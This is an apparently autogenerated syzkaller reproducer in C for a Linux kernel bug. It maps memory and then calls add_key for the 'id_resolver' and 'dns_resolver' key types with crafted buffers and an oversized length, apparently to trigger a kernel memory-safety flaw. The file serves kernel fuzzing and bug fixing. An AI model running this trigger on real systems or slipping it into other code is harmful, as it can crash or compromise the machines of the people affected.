// https://syzkaller.appspot.com/bug?id=f0e01204e654ebd94c1d5ec4b99a76e9aa668bf7 // autogenerated by syzkaller (http://github.com/google/syzkaller) #define _GNU_SOURCE #include #include #include #include #include #include void loop() { memcpy((void*)0x20000040, "id_resolver", 12); *(uint8_t*)0x200000c0 = 0x73; *(uint8_t*)0x200000c1 = 0x79; *(uint8_t*)0x200000c2 = 0x7a; *(uint8_t*)0x200000c3 = 0x20; *(uint8_t*)0x200000c4 = 0; memcpy((void*)0x20000200, "\x47\x01\xf1\x11\xec\x8a\xe2\xf4\x19\x1f\xea\x04\x4e\x0e\xe7\xb7\x31" "\x16\x32\xad\x41\x96\x4c\x07\x26\xc9\xf2\xbb\x5b\xf6\xc2\x98\x34\x3a" "\x44\x14\xd8\xfc\x24\xbe\xdf\xa8\x35\xc9\x4d\x24\xbd\x28\x51\xc4\xd6" "\x33\xc9\x99\x39\x2e\x03\x47\xa8\x22\xfc\xd5\x94\x8b\x62\xe5\xa3\x23" "\x90\x0b\x0c\x53\x97\xf1\x49\xc9\xb7\x8d\xc2\x31\x9a\xfd\xda\xd7\x98" "\xd5\x5d\x45\xe8\x37\x39\xaf\xdb\xa7\xe8\x1c\xf8\xe9\xc2\x6c\xf7\xd7" "\xcd\x6c\xd3\x52\x5b\xe1\xb1\xe0\x72\xa8\x4f\x95\x18\x10\x31\x23\xb1" "\x1b\x03\x2f\x60\xff\x5f\xd9\x89\x0e\xfe\xb9\xc5\xc0\x12\xcf\xd5\x57" "\x9d\x32\x32\x4b\x81\x7a\x67\x92\x89\x15\x5b\x5e\x88\xb7\xb1\xc7\xe6" "\xd3\xc6\xe1\x38\x71\x25\x30\xdc\x97\x8a\x11\xcb\xa6\x80\x67\xf5\xc1" "\xca\x2a\xb7\xc9\x07\x23\x71\xed\x88\x88\x17\x58\x8c\x41\x97\xbe\x74" "\xff\x44\x6d\x72\xaa\x63\x1c\xfa\x5c\x94\x90\xfb\xa2\x85\x40\x3d\xdd" "\x51\x04\xe3\x5d\xb4\x1c\x60\xaa\x70\x4c\x08\x0e\x13\x1b\xea\xbe\x29" "\xa8\x02\xfc\x41\xf8\xb7\x84", 228); syscall(__NR_add_key, 0x20000040, 0x200000c0, 0x20000200, 0xe4, 0); memcpy((void*)0x20000080, "dns_resolver", 13); *(uint8_t*)0x20000000 = 0x73; *(uint8_t*)0x20000001 = 0x79; *(uint8_t*)0x20000002 = 0x7a; *(uint8_t*)0x20000003 = 0; *(uint8_t*)0x20000004 = 0; syscall(__NR_add_key, 0x20000080, 0x20000000, 0x200000c0, 0xfffff, 0xfffffffb); } int main() { syscall(__NR_mmap, 0x20000000, 0x1000000, 3, 0x32, -1, 0); loop(); return 0; }